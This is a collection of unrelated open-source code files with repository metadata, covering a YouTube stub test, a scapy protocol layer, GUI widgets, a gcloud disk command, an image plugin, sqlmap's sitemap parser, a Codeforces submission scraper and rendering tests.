params, config_name)
apache-2.0
deepsrijit1105/edx-platform
common/djangoapps/terrain/stubs/tests/test_youtube_stub.py
172
2639
""" Unit test for stub YouTube implementation. """ import unittest import requests from ..youtube import StubYouTubeService class StubYouTubeServiceTest(unittest.TestCase): def setUp(self): super(StubYouTubeServiceTest, self).setUp() self.server = StubYouTubeService() self.url = "http://127.0.0.1:{0}/".format(self.server.port) self.server.config['time_to_response'] = 0.0 self.addCleanup(self.server.shutdown) def test_unused_url(self): response = requests.get(self.url + 'unused_url') self.assertEqual("Unused url", response.content) @unittest.skip('Failing intermittently due to inconsistent responses from YT. See TE-871') def test_video_url(self): response = requests.get( self.url + 'test_youtube/OEoXaMPEzfM?v=2&alt=jsonc&callback=callback_func' ) # YouTube metadata for video `OEoXaMPEzfM` states that duration is 116. self.assertEqual( 'callback_func({"data": {"duration": 116, "message": "I\'m youtube.", "id": "OEoXaMPEzfM"}})', response.content ) def test_transcript_url_equal(self): response = requests.get( self.url + 'test_transcripts_youtube/t__eq_exist' ) self.assertEqual( "".join([ '<?xml version="1.0" encoding="utf-8" ?>', '<transcript><text start="1.0" dur="1.0">', 'Equal transcripts</text></transcript>' ]), response.content ) def test_transcript_url_not_equal(self): response = requests.get( self.url + 'test_transcripts_youtube/t_neq_exist', ) self.assertEqual( "".join([ '<?xml version="1.0" encoding="utf-8" ?>', '<transcript><text start="1.1" dur="5.5">', 'Transcripts sample, different that on server', '</text></transcript>' ]), response.content ) def test_transcript_not_found(self): response = requests.get(self.url + 'test_transcripts_youtube/some_id') self.assertEqual(404, response.status_code) def test_reset_configuration(self): reset_config_url = self.url + 'del_config' # add some configuration data self.server.config['test_reset'] = 'This is a reset config test' # reset server configuration response = requests.delete(reset_config_url) self.assertEqual(response.status_code, 200) # ensure that server config dict is empty after successful reset self.assertEqual(self.server.config, {})
agpl-3.0
guedou/scapy-appveyor
scapy/contrib/spbm.py
3
1670
# IEEE 802.1aq - Shorest Path Bridging Mac-in-mac (SPBM): # Ethernet based link state protocol that enables Layer 2 Unicast, Layer 2 Multicast, Layer 3 Unicast, and Layer 3 Multicast virtualized services # https://en.wikipedia.org/wiki/IEEE_802.1aq # Modeled after the scapy VXLAN contribution # ############################################################# # Example SPB Frame Creation # # Note the outer Dot1Q Ethertype marking (0x88e7) ############################################################# # backboneEther = Ether(dst='00:bb:00:00:90:00', src='00:bb:00:00:40:00', type=0x8100) # backboneDot1Q = Dot1Q(vlan=4051,type=0x88e7) # backboneServiceID = SPBM(prio=1,isid=20011) # customerEther = Ether(dst='00:1b:4f:5e:ca:00',src='00:00:00:00:00:01',type=0x8100) # customerDot1Q = Dot1Q(prio=1,vlan=11,type=0x0800) # customerIP = IP(src='10.100.11.10',dst='10.100.12.10',id=0x0629,len=106) # customerUDP = UDP(sport=1024,dport=1025,chksum=0,len=86) # # spb_example = backboneEther/backboneDot1Q/backboneServiceID/customerEther/customerDot1Q/customerIP/customerUDP/"Payload" from scapy.packet import Packet, bind_layers from scapy.fields import * from scapy.layers.l2 import Ether, Dot1Q class SPBM(Packet): name = "SPBM" fields_desc = [ BitField("prio", 0, 3), BitField("dei", 0, 1), BitField("nca", 0, 1), BitField("res1", 0, 1), BitField("res2", 0, 2), ThreeBytesField("isid", 0)] def mysummary(self): return self.sprintf("SPBM (isid=%SPBM.isid%") bind_layers(Dot1Q, SPBM, type=0x88e7) bind_layers(SPBM, Ether)
gpl-2.0
informaticameg/Posta
GUI/mtw_pos.py
1
6185
#!/usr/bin/env python # -*- coding: utf-8 -*- # # Copyright 2011 Ferreyra, Jonathan <jalejandroferreyra@gmail.com> # Copyright 2011 Fernandez, Emiliano <emilianohfernandez@gmail.com> # # This program is free software; you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation; either version 2 of the License, or # (at your option) any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with this program; if not, write to the Free Software # Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, # MA 02110-1301, USA. from PyQt4 import QtCore, QtGui class MyTableWidget(): def __init__(self,TW,listadecolumnas, listadealineaciones = [], indexColumn = 1, widthColumn = 400): self.__widget = TW quitAction = QtGui.QAction("Quit", self.__widget) self.__widget.addAction(quitAction) self.__widget.horizontalHeader().setDefaultSectionSize(120) #NEXT:que divida los campos en la tabla y que ponga bien los numeros self.__widget.horizontalHeader().setResizeMode(0)#maximixa los campos en la tabla self.__widget.setSelectionMode(QtGui.QAbstractItemView.ExtendedSelection) self.__widget.setSelectionBehavior(QtGui.QAbstractItemView.SelectRows) self.__columns = listadecolumnas # 'indexColumn' es un integer que representa la # posicion de la columna que se desea establecer el ancho self.__indexColumn = indexColumn # 'widthColumn' es el valor del ancho para la columna self.__widthColumn = widthColumn if listadealineaciones : alineaciones = { 'L':QtCore.Qt.AlignLeft, 'C':QtCore.Qt.AlignCenter, 'R':QtCore.Qt.AlignRight } self.__columns_align = [alineaciones[ali] for ali in listadealineaciones] else: self.__columns_align = [QtCore.Qt.AlignCenter] * len(listadecolumnas) self.__widget.setColumnCount(len(self.__columns)) for i in xrange(self.__widget.columnCount()): # set horizontal headers item = QtGui.QTableWidgetItem(self.__columns[i].capitalize())# the text item.setTextAlignment(QtCore.Qt.AlignCenter)# the alignment self.__widget.setHorizontalHeaderItem(i, item) def appendItem(self,listadedatos): alineaciones = self.__columns_align def aux(x, cell): item = QtGui.QTableWidgetItem(unicode(cell))# the text item.setFlags(QtCore.Qt.ItemIsEnabled | QtCore.Qt.ItemIsSelectable ) item.setTextAlignment( alineaciones[x] )# the alignment widget.setItem(y, x, item) widget = self.__widget y = widget.rowCount() if listadedatos != None: listadedatos = map(lambda valor : '' if valor is None else valor, listadedatos) widget.setRowCount(y+1) [ aux(x, cell) for x,cell in enumerate(listadedatos)] widget.setColumnWidth(self.__indexColumn, self.__widthColumn) def addItems(self, DATA): """ DATA debe ser una lista de listas """ alineaciones = self.__columns_align def addOneItem(listadedatos, y, indexCol, widthCol): def aux(x, cell): item = QtGui.QTableWidgetItem(unicode(cell))# the text item.setFlags(QtCore.Qt.ItemIsEnabled | QtCore.Qt.ItemIsSelectable ) item.setTextAlignment( alineaciones[x] )# the alignment widget.setItem(y, x, item) # establece el ancho de la columna widget.setColumnWidth(indexCol, widthCol) QtGui.QApplication.processEvents() listadedatos = ['' if dato is None else dato for dato in listadedatos ] [ aux(x, cell) for x,cell in enumerate(listadedatos)] if DATA != None: widget = self.__widget self.fullClear() widget.setRowCount(len(DATA)) [addOneItem(data, indice, self.__indexColumn, self.__widthColumn) for indice, data in enumerate(DATA)] def getRowString(self, item = 'null'): """Devuelve una tupla con los datos de el tablewidget en la fila seleccionada devuelve los datos en unicode""" tablewidget = self.__widget tamano = tablewidget.columnCount() try: if item != 'null': x = item else: x = tablewidget.currentItem().row() datos=[] for num in range(tamano): qs = tablewidget.item(x,num).text() datos.append(unicode(qs.toUtf8(),'utf-8')) return tuple(datos) except Exception : return None def getListSelectedRows(self): seleccionados = self.__widget.selectionModel().selectedRows() rows = [self.getRowString(idx.row()) for idx in seleccionados] return rows def getAllItems(self): tamano = self.__widget.rowCount() allitemstring = [self.getRowString(y) for y in range(tamano)] return allitemstring def fullClear(self): self.widget.setRowCount(0) # [self.__widget.removeRow(i) for i in range( self.__widget.rowCount() )[::-1]] def __get_widget(self): return self.__widget def __set_widget(self, value): self.__widget = value widget = property(__get_widget, __set_widget, "widget's docstring") def main(): return 0 if __name__ == '__main__': main()
gpl-3.0
KaranToor/MA450
google-cloud-sdk/.install/.backup/lib/surface/compute/instances/detach_disk.py
3
4599
# Copyright 2014 Google Inc. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """Command for detaching a disk from an instance.""" import copy from googlecloudsdk.api_lib.compute import base_classes from googlecloudsdk.calliope import exceptions from googlecloudsdk.command_lib.compute import flags from googlecloudsdk.command_lib.compute.instances import flags as instance_flags class DetachDisk(base_classes.ReadWriteCommand): """Detach disks from Compute Engine virtual machine instances. *{command}* is used to detach disks from virtual machines. Detaching a disk without first unmounting it may result in incomplete I/O operations and data corruption. To unmount a persistent disk on a Linux-based image, ssh into the instance and run: $ sudo umount /dev/disk/by-id/google-DEVICE_NAME """ @staticmethod def Args(parser): instance_flags.INSTANCE_ARG.AddArgument(parser) disk_group = parser.add_mutually_exclusive_group(required=True) disk_name = disk_group.add_argument( '--disk', help='Specify a disk to remove by persistent disk name.') disk_name.detailed_help = """\ Specifies a disk to detach by its resource name. If you specify a disk to remove by persistent disk name, then you must not specify its device name using the ``--device-name'' flag. """ device_name = disk_group.add_argument( '--device-name', help=('Specify a disk to remove by the name the guest operating ' 'system sees.')) device_name.detailed_help = """\ Specifies a disk to detach by its device name, which is the name that the guest operating system sees. The device name is set at the time that the disk is attached to the instance, and needs not be the same as the persistent disk name. If the disk's device name is specified, then its persistent disk name must not be specified using the ``--disk'' flag. """ @property def service(self): return self.compute.instances @property def resource_type(self): return 'instances' def CreateReference(self, args): return instance_flags.INSTANCE_ARG.ResolveAsResource( args, self.resources, scope_lister=flags.GetDefaultScopeLister( self.compute_client, self.project)) def GetGetRequest(self, args): return (self.service, 'Get', self.messages.ComputeInstancesGetRequest( instance=self.ref.Name(), project=self.project, zone=self.ref.zone)) def GetSetRequest(self, args, replacement, existing): removed_disk = list( set(disk.deviceName for disk in existing.disks) - set(disk.deviceName for disk in replacement.disks))[0] return (self.service, 'DetachDisk', self.messages.ComputeInstancesDetachDiskRequest( deviceName=removed_disk, instance=self.ref.Name(), project=self.project, zone=self.ref.zone)) def Modify(self, args, existing): replacement = copy.deepcopy(existing) if args.disk: disk_ref = self.resources.Parse( args.disk, collection='compute.disks', params={'zone': self.ref.zone}) replacement.disks = [disk for disk in existing.disks if disk.source != disk_ref.SelfLink()] if len(existing.disks) == len(replacement.disks): raise exceptions.ToolException( 'Disk [{0}] is not attached to instance [{1}] in zone [{2}].' .format(disk_ref.Name(), self.ref.Name(), self.ref.zone)) else: replacement.disks = [disk for disk in existing.disks if disk.deviceName != args.device_name] if len(existing.disks) == len(replacement.disks): raise exceptions.ToolException( 'No disk with device name [{0}] is attached to instance [{1}] in ' 'zone [{2}].' .format(args.device_name, self.ref.Name(), self.ref.zone)) return replacement
apache-2.0
oicebot/androidtool
androidtool.py
1
9538
#! /usr/bin/env python # # GUI module generated by PAGE version 4.7 # In conjunction with Tcl version 8.6 # Mar 22, 2016 10:04:14 AM import sys try: from Tkinter import * except ImportError: from tkinter import * try: import ttk py3 = 0 except ImportError: import tkinter.ttk as ttk py3 = 1 import androidtool_support def vp_start_gui(): '''Starting point when module is the main routine.''' global val, w, root root = Tk() androidtool_support.set_Tk_var() top = Android_Tools(root) androidtool_support.init(root, top) #ubuntutool_support.init(root, top) root.mainloop() w = None def create_Android_Tools(root, *args, **kwargs): '''Starting point when module is imported by another program.''' global w, w_win, rt rt = root w = Toplevel(root) androidtool_support.set_Tk_var() top = Android_Tools(w) androidtool_support.init(w, top, *args, **kwargs) return (w, top) def destroy_Android_Tools(): global w w.destroy() w = None class Android_Tools: def __init__(self, top=None): '''This class configures and populates the toplevel window. top is the toplevel containing window.''' _bgcolor = '#d9d9d9' # X11 color: 'gray85' _fgcolor = '#000000' # X11 color: 'black' _compcolor = '#d9d9d9' # X11 color: 'gray85' _ana1color = '#d9d9d9' # X11 color: 'gray85' _ana2color = '#d9d9d9' # X11 color: 'gray85' self.style = ttk.Style() if sys.platform == "win32": self.style.theme_use('winnative') self.style.configure('.', background=_bgcolor) self.style.configure('.', foreground=_fgcolor) self.style.configure('.', font="TkDefaultFont") self.style.map('.', background= [('selected', _compcolor), ('active', _ana2color)]) top.geometry("700x600+1129+678") top.title("Android Tools") top.configure(highlightcolor="black") self.TL_select = ttk.Label(top) self.TL_select.place(relx=0.01, rely=0.02, height=19, width=147) self.TL_select.configure(background=_bgcolor) self.TL_select.configure(foreground="#000000") self.TL_select.configure(relief=FLAT) self.TL_select.configure(text='''Please select target devices:''') #self.TB_refreshdev = ttk.Button(top) #self.TB_refreshdev.place(relx=0.31, rely=0.03, height=28, width=74) #self.TB_refreshdev.configure(command=androidtool_support.refresh_devices) #self.TB_refreshdev.configure(takefocus="") #self.TB_refreshdev.configure(text='''Refresh''') self.TC_devices = ttk.Combobox(top, postcommand=androidtool_support.refresh_devices) self.TC_devices.place(relx=0.01, rely=0.05, relheight=0.04, relwidth=0.3) self.TC_devices.configure(textvariable=androidtool_support.combobox) self.TC_devices.configure(takefocus="") self.TC_devices.bind("<<ComboboxSelected>>", androidtool_support.newselection) self.TL_devicesinfo = ttk.Label(top) self.TL_devicesinfo.place(relx=0.44, rely=0.02, height=21, relwidth=0.45) self.TL_devicesinfo.configure(background=_bgcolor) self.TL_devicesinfo.configure(foreground="#000000") self.TL_devicesinfo.configure(relief=FLAT) self.TL_devicesinfo.configure(textvariable= androidtool_support.device_info) self.TL_devicesinfo.configure(width=193) self.List_local = ScrolledListBox(top) self.List_local.place(relx=0.01, rely=0.12, relheight=0.86, relwidth=0.45) self.List_local.configure(background="white") self.List_local.configure(font="TkFixedFont") self.List_local.configure(highlightcolor="#d9d9d9") self.List_local.configure(selectbackground="#c4c4c4") self.List_local.configure(width=10) self.List_local.bind("<Double-Button-1>", androidtool_support.double_click) self.List_device = ScrolledListBox(top) self.List_device.place(relx=0.54, rely=0.12, relheight=0.86, relwidth=0.45) self.List_device.configure(background="white") self.List_device.configure(font="TkFixedFont") self.List_device.configure(highlightcolor="#d9d9d9") self.List_device.configure(selectbackground="#c4c4c4") self.List_device.configure(width=10) self.List_device.bind("<Double-Button-1>", androidtool_support.double_click2) self.TB_push = ttk.Button(top) self.TB_push.place(relx=0.47, rely=0.13, height=38, width=44) self.TB_push.configure(command=androidtool_support.push_file) self.TB_push.configure(takefocus="") self.TB_push.configure(text='''->''') self.TB_pull = ttk.Button(top) self.TB_pull.place(relx=0.47, rely=0.22, height=38, width=44) self.TB_pull.configure(command=androidtool_support.pull_file) self.TB_pull.configure(takefocus="") self.TB_pull.configure(text='''<-''') self.TB_refreshdir = ttk.Button(top) self.TB_refreshdir.place(relx=0.47, rely=0.3, height=38, width=44) self.TB_refreshdir.configure(command=androidtool_support.refresh_dir) self.TB_refreshdir.configure(takefocus="") self.TB_refreshdir.configure(text='''@''') self.TB_install = ttk.Button(top) self.TB_install.place(relx=0.47, rely=0.38, height=38, width=44) self.TB_install.configure(command=androidtool_support.install_apk) self.TB_install.configure(takefocus="") self.TB_install.configure(text='''X''') self.TL_localpath = ttk.Label(top) self.TL_localpath.place(relx=0.01, rely=0.09, height=19, relwidth=0.44) self.TL_localpath.configure(background=_bgcolor) self.TL_localpath.configure(foreground="#000000") self.TL_localpath.configure(relief=FLAT) self.TL_localpath.configure(text='''Local Path:''') self.TL_devicepath = ttk.Label(top) self.TL_devicepath.place(relx=0.54, rely=0.09, height=19, relwidth=0.44) self.TL_devicepath.configure(background=_bgcolor) self.TL_devicepath.configure(foreground="#000000") self.TL_devicepath.configure(relief=FLAT) self.TL_devicepath.configure(text='''Device Path:''') self.TProgressbar1 = ttk.Progressbar(top) self.TProgressbar1.place(relx=0.44, rely=0.05, relwidth=0.54, relheight=0.0, height=19) self.TProgressbar1.configure(length="0") self.TB_Browse = ttk.Button(top) self.TB_Browse.place(relx=0.31, rely=0.03, height=28, width=74) self.TB_Browse.configure(takefocus="") self.TB_Browse.configure(text='''Browse Dir''') self.TB_Browse.configure(command=androidtool_support.browse_dir) self.TB_Browse.configure(width=64) # The following code is added to facilitate the Scrolled widgets you specified. class AutoScroll(object): '''Configure the scrollbars for a widget.''' def __init__(self, master): # Rozen. Added the try-except clauses so that this class # could be used for scrolled entry widget for which vertical # scrolling is not supported. 5/7/14. try: vsb = ttk.Scrollbar(master, orient='vertical', command=self.yview) except: pass hsb = ttk.Scrollbar(master, orient='horizontal', command=self.xview) #self.configure(yscrollcommand=self._autoscroll(vsb), # xscrollcommand=self._autoscroll(hsb)) try: self.configure(yscrollcommand=self._autoscroll(vsb)) except: pass self.configure(xscrollcommand=self._autoscroll(hsb)) self.grid(column=0, row=0, sticky='nsew') try: vsb.grid(column=1, row=0, sticky='ns') except: pass hsb.grid(column=0, row=1, sticky='ew') master.grid_columnconfigure(0, weight=1) master.grid_rowconfigure(0, weight=1) # Copy geometry methods of master (taken from ScrolledText.py) if py3: methods = Pack.__dict__.keys() | Grid.__dict__.keys() \ | Place.__dict__.keys() else: methods = Pack.__dict__.keys() + Grid.__dict__.keys() \ + Place.__dict__.keys() for meth in methods: if meth[0] != '_' and meth not in ('config', 'configure'): setattr(self, meth, getattr(master, meth)) @staticmethod def _autoscroll(sbar): '''Hide and show scrollbar as needed.''' def wrapped(first, last): first, last = float(first), float(last) if first <= 0 and last >= 1: sbar.grid_remove() else: sbar.grid() sbar.set(first, last) return wrapped def __str__(self): return str(self.master) def _create_container(func): '''Creates a ttk Frame with a given master, and use this new frame to place the scrollbars and the widget.''' def wrapped(cls, master, **kw): container = ttk.Frame(master) return func(cls, container, **kw) return wrapped class ScrolledListBox(AutoScroll, Listbox): '''A standard Tkinter Text widget with scrollbars that will automatically show/hide as needed.''' @_create_container def __init__(self, master, **kw): Listbox.__init__(self, master, **kw) AutoScroll.__init__(self, master) if __name__ == '__main__': vp_start_gui()
gpl-3.0
yd0str/infernal-twin
build/pillow/PIL/SunImagePlugin.py
26
1965
# # The Python Imaging Library. # $Id$ # # Sun image file handling # # History: # 1995-09-10 fl Created # 1996-05-28 fl Fixed 32-bit alignment # 1998-12-29 fl Import ImagePalette module # 2001-12-18 fl Fixed palette loading (from Jean-Claude Rimbault) # # Copyright (c) 1997-2001 by Secret Labs AB # Copyright (c) 1995-1996 by Fredrik Lundh # # See the README file for information on usage and redistribution. # __version__ = "0.3" from PIL import Image, ImageFile, ImagePalette, _binary i16 = _binary.i16be i32 = _binary.i32be def _accept(prefix): return len(prefix) >= 4 and i32(prefix) == 0x59a66a95 ## # Image plugin for Sun raster files. class SunImageFile(ImageFile.ImageFile): format = "SUN" format_description = "Sun Raster File" def _open(self): # HEAD s = self.fp.read(32) if i32(s) != 0x59a66a95: raise SyntaxError("not an SUN raster file") offset = 32 self.size = i32(s[4:8]), i32(s[8:12]) depth = i32(s[12:16]) if depth == 1: self.mode, rawmode = "1", "1;I" elif depth == 8: self.mode = rawmode = "L" elif depth == 24: self.mode, rawmode = "RGB", "BGR" else: raise SyntaxError("unsupported mode") compression = i32(s[20:24]) if i32(s[24:28]) != 0: length = i32(s[28:32]) offset = offset + length self.palette = ImagePalette.raw("RGB;L", self.fp.read(length)) if self.mode == "L": self.mode = rawmode = "P" stride = (((self.size[0] * depth + 7) // 8) + 3) & (~3) if compression == 1: self.tile = [("raw", (0, 0)+self.size, offset, (rawmode, stride))] elif compression == 2: self.tile = [("sun_rle", (0, 0)+self.size, offset, rawmode)] # # registry Image.register_open("SUN", SunImageFile, _accept) Image.register_extension("SUN", ".ras")
gpl-3.0
glaudsonml/kurgan-ai
tools/sqlmap/lib/parse/sitemap.py
2
1782
#!/usr/bin/env python """ Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ import httplib import re from lib.core.common import readInput from lib.core.data import kb from lib.core.data import logger from lib.core.exception import SqlmapSyntaxException from lib.request.connect import Connect as Request from thirdparty.oset.pyoset import oset abortedFlag = None def parseSitemap(url, retVal=None): global abortedFlag if retVal is not None: logger.debug("parsing sitemap '%s'" % url) try: if retVal is None: abortedFlag = False retVal = oset() try: content = Request.getPage(url=url, raise404=True)[0] if not abortedFlag else "" except httplib.InvalidURL: errMsg = "invalid URL given for sitemap ('%s')" % url raise SqlmapSyntaxException, errMsg for match in re.finditer(r"<loc>\s*([^<]+)", content or ""): if abortedFlag: break url = match.group(1).strip() if url.endswith(".xml") and "sitemap" in url.lower(): if kb.followSitemapRecursion is None: message = "sitemap recursion detected. Do you want to follow? [y/N] " test = readInput(message, default="N") kb.followSitemapRecursion = test[0] in ("y", "Y") if kb.followSitemapRecursion: parseSitemap(url, retVal) else: retVal.add(url) except KeyboardInterrupt: abortedFlag = True warnMsg = "user aborted during sitemap parsing. sqlmap " warnMsg += "will use partial list" logger.warn(warnMsg) return retVal
apache-2.0
incaser/server-tools
module_prototyper/tests/test_prototype_module_export.py
26
3107
# -*- encoding: utf-8 -*- # ############################################################################# # # OpenERP, Open Source Management Solution # This module copyright (C) 2010 - 2014 Savoir-faire Linux # (<http://www.savoirfairelinux.com>). # # This program is free software: you can redistribute it and/or modify # it under the terms of the GNU Affero General Public License as # published by the Free Software Foundation, either version 3 of the # License, or (at your option) any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU Affero General Public License for more details. # # You should have received a copy of the GNU Affero General Public License # along with this program. If not, see <http://www.gnu.org/licenses/>. # ############################################################################## from openerp.tests import common import zipfile import StringIO class test_prototype_module_export(common.TransactionCase): def setUp(self): super(test_prototype_module_export, self).setUp() self.main_model = self.env['module_prototyper.module.export'] self.prototype_model = self.env['module_prototyper'] self.module_category_model = self.env[ 'ir.module.category' ] self.prototype = self.prototype_model.create({ 'name': 't_name', 'category_id': self.module_category_model.browse(1).id, 'human_name': 't_human_name', 'summary': 't_summary', 'description': 't_description', 'author': 't_author', 'maintainer': 't_maintainer', 'website': 't_website', }) self.exporter = self.main_model.create({'name': 't_name'}) def test_action_export_assert_for_wrong_active_model(self): """Test if the assertion raises.""" exporter = self.main_model.with_context( active_model='t_active_model' ).create({}) self.assertRaises( AssertionError, exporter.action_export, [exporter.id], ) def test_action_export_update_wizard(self): """Test if the wizard is updated during the process.""" exporter = self.main_model.with_context( active_model=self.prototype_model._name, active_id=self.prototype.id ).create({}) exporter.action_export(exporter.id) self.assertEqual(exporter.state, 'get') self.assertEqual(exporter.name, '{}.zip'.format(self.prototype.name)) def test_zip_files_returns_tuple(self): """Test the method return of the method that generate the zip file.""" ret = self.main_model.zip_files(self.exporter, [self.prototype]) self.assertIsInstance(ret, tuple) self.assertIsInstance( ret.zip_file, zipfile.ZipFile ) self.assertIsInstance( ret.stringIO, StringIO.StringIO )
agpl-3.0
matgr1/three.js
utils/exporters/blender/addons/io_three/exporter/api/light.py
104
1461
from bpy import data, types from .. import utilities, logger def _lamp(func): """ :param func: """ def inner(name, *args, **kwargs): """ :param name: :param *args: :param **kwargs: """ if isinstance(name, types.Lamp): lamp = name else: lamp = data.lamps[name] return func(lamp, *args, **kwargs) return inner @_lamp def angle(lamp): """ :param lamp: :rtype: float """ logger.debug("light.angle(%s)", lamp) return lamp.spot_size @_lamp def color(lamp): """ :param lamp: :rtype: int """ logger.debug("light.color(%s)", lamp) colour = (lamp.color.r, lamp.color.g, lamp.color.b) return utilities.rgb2int(colour) @_lamp def distance(lamp): """ :param lamp: :rtype: float """ logger.debug("light.distance(%s)", lamp) return lamp.distance @_lamp def intensity(lamp): """ :param lamp: :rtype: float """ logger.debug("light.intensity(%s)", lamp) return round(lamp.energy, 2) # mapping enum values to decay exponent __FALLOFF_TO_EXP = { 'CONSTANT': 0, 'INVERSE_LINEAR': 1, 'INVERSE_SQUARE': 2, 'CUSTOM_CURVE': 0, 'LINEAR_QUADRATIC_WEIGHTED': 2 } @_lamp def falloff(lamp): """ :param lamp: :rtype: float """ logger.debug("light.falloff(%s)", lamp) return __FALLOFF_TO_EXP[lamp.falloff_type]
mit
Z2Y/CUITOJHelper-BackEnd
spider/CFSpider.py
3
4618
from __init__ import * from BaseSpider import BaseSpider import json, time class CFSpider(BaseSpider): def __init__(self): BaseSpider.__init__(self) self.login_status = True def get_user_info(self): url = 'http://codeforces.com/api/user.info?handles='+self.account.nickname page = self.load_page(url) try: info = json.JSONDecoder().decode(page) status = info['status'] if status == 'OK': result = info['result'][0] return result else: return None except Exception, e: raise Exception('GET USER INFO FAILED:' + e.message) def get_problem_count(self): user_info = self.get_user_info() ret = {'solved': user_info['rating'], 'submitted': user_info['maxRating']} return ret def get_status(self, start, length): url = 'http://codeforces.com/api/user.status?handle={0}&from={1}&count={2}'.format(self.account.nickname, start, length) page = self.load_page(url) try: info = json.JSONDecoder().decode(page) status = info['status'] if status == 'OK': return info['result'] else: return [] except Exception, e: raise Exception('GET STATUES ERROR:' + e.message) def is_gym(self, contest_id): if len(str(contest_id)) > 3: return True return False def get_status_list(self, start=1, length=30): submits = self.get_status(start, length) slist = [] try: for submit in submits: if self.is_gym(submit['contestId']): continue submit_time = time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(submit['creationTimeSeconds'])) cur = {'contest_id': submit['contestId'], 'pro_index': submit['problem']['index'], 'run_id': submit['id'], 'submit_time': submit_time, 'run_time': submit['timeConsumedMillis'], 'memory': submit['memoryConsumedBytes'] / 1024, 'lang': submit['programmingLanguage'], 'result': submit['verdict'] } cur['pro_id'] = str(cur['contest_id']) + str(cur['pro_index']) cur['code'] = 'http://codeforces.com/contest/'+str(cur['contest_id'])+'/submission/'+str(cur['run_id']) slist.append(cur) return slist except Exception, e: raise Exception('GET STATUS LIST ERROR: ' + e.message) def get_solved_code(self, contest_id, run_id): url = 'http://codeforces.com/contest/'+str(contest_id)+'/submission/'+str(run_id) page = self.load_page(url) print url try: soup = BeautifulSoup(page) return soup.find('pre').text except Exception, e: raise Exception("CF crawl code error " + e.message) def update_submit(self, init=True, length=30): start = 1 while True: slist = self.get_status_list(start) if not slist: return try: for status in slist: if self.is_gym(status['contest_id']): continue nsub = Submit.query.filter(Submit.run_id == status['run_id'], Submit.oj_name == self.account.oj_name).first() if nsub and not init: return if not nsub: nsub = Submit(status['pro_id'], self.account) nsub.update_info(status['run_id'],status['submit_time'],status['run_time'],status['memory'],status['lang'],status['code'],status['result']) except Exception, e: db.session.rollback() raise Exception('update Status Error:' + e.message) if init: db.session.commit() time.sleep(1) start += length self.account.last_update_time = datetime.datetime.now() db.session.commit() def update_account(self, init): if not self.account: raise Exception("CF account not set") count = self.get_problem_count() self.account.set_problem_count(count['solved'], count['submitted']) self.account.last_update_time = datetime.datetime.now() self.account.save() self.update_submit(init) self.logout()
mit
danieldresser/cortex
test/IECoreRI/DetailTest.py
7
2410
########################################################################## # # Copyright (c) 2009-2013, Image Engine Design Inc. All rights reserved. # # Redistribution and use in source and binary forms, with or without # modification, are permitted provided that the following conditions are # met: # # * Redistributions of source code must retain the above copyright # notice, this list of conditions and the following disclaimer. # # * Redistributions in binary form must reproduce the above copyright # notice, this list of conditions and the following disclaimer in the # documentation and/or other materials provided with the distribution. # # * Neither the name of Image Engine Design nor the names of any # other contributors to this software may be used to endorse or # promote products derived from this software without specific prior # written permission. # # THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS # IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, # THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR # PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR # CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, # EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, # PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR # PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF # LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING # NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS # SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. # ########################################################################## import unittest import IECore import IECoreRI import os.path import os class DetailTest( IECoreRI.TestCase ) : def test( self ) : r = IECoreRI.Renderer( "test/IECoreRI/output/testDetail.rib" ) r.worldBegin() r.setAttribute( "ri:detail", IECore.Box3f( IECore.V3f( 1, 2, 3 ), IECore.V3f( 4, 5, 6 ) ) ) r.setAttribute( "ri:detailRange", IECore.FloatVectorData( [ 0, 1, 2, 3 ] ) ) r.worldEnd() l = "".join( file( "test/IECoreRI/output/testDetail.rib" ).readlines() ) self.assert_( "Detail [ 1 4 2 5 3 6 ]" in l ) self.assert_( "DetailRange 0 1 2 3" in l ) if __name__ == "__main__": unittest.main()
bsd-3-clause
ryokochang/Slab-GCS
packages/IronPython.StdLib.2.7.5-beta1/content/Lib/distutils/command/bdist.py
228
5596
